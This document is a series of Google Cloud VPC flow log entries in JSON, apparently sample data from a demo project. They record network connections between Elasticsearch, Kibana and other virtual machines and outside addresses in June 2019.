-{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"203.0.113.58","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"203.0.113.134","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"203.0.113.93","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"203.0.113.134","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"203.0.113.134","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"203.0.113.134","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"203.0.113.58","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"203.0.113.101","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.0.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"203.0.113.58","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.0.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"203.0.113.134","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"203.0.113.58","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 